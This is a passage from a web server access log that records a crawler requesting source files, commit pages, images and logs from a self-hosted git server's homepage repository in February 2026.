+claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" [Client 216.73.216.188] [Length 5722] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 11908] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11322] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" [Client 216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" [Client 216.73.216.188] [Length 9947] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" [Client 216.73.216.188] [Length 9947] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" [Client 216.73.216.188] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" [Client 216.73.216.188] [Length 42638] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" [Client 216.73.216.188] [Length 39264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" [Client 216.73.216.188] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" [Client 216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log?display=rendered" [Client 216.73.216.188] [Length 11009] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 10861] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1?display=rendered" [Client 216.73.216.188] [Length 10995] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64?display=source" [Client 216.73.216.188] [Length 11047] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html?display=rendered" [Client 216.73.216.188] [Length 14221] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html?display=source" [Client 216.73.216.188] [Length 14407] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf?display=rendered" [Client 216.73.216.188] [Length 11021] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6?display=rendered" [Client 216.73.216.188] [Length 10996] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" [Client 216.73.216.188] [Length 9944] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" [Client 216.73.216.188] [Length 1445] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json?display=source" [Client 216.73.216.188] [Length 11060] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4?display=rendered" [Client 216.73.216.188] [Length 10996] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3?display=rendered" [Client 216.73.216.188] [Length 10997] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7?display=rendered" [Client 216.73.216.188] [Length 10955] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" [Client 216.73.216.188] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fassets%2Fjs%2Fscript.js" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 11961] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:20 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 10859] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" [Client 216.73.216.188] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2Fassets" [Client 216.73.216.188] [Length 24764] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:20 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10888] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 11647] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf?display=rendered" [Client 216.73.216.188] [Length 11020] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 10871] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 10861] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py?display=source" [Client 216.73.216.188] [Length 13016] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" [Client 216.73.216.188] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2Fdata" [Client 216.73.216.188] [Length 64188] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:21 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5?display=rendered" [Client 216.73.216.188] [Length 10991] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11624] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr 